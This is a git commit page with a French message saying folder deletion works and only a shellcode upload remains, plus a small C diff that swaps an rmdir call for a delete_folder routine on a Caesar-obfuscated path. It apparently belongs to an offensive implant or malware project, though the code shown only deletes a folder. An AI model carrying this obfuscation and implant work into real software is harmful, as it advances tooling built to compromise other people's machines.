delete_folder marche
manque plus que l'upload de shellcode et on est bon !
This commit is contained in:
@@ -211,8 +211,11 @@ retry:
|
||||
goto retry;
|
||||
}
|
||||
|
||||
Api.rmdir(CAESAR_DECRYPT(path));
|
||||
LPCWSTR wstr = ConvertCharToWChar(CAESAR_DECRYPT(path));
|
||||
|
||||
delete_folder(wstr);
|
||||
|
||||
Api.free((LPWSTR)wstr);
|
||||
Api.free(path);
|
||||
}
|
||||
|
||||
|
||||
Reference in New Issue
Block a user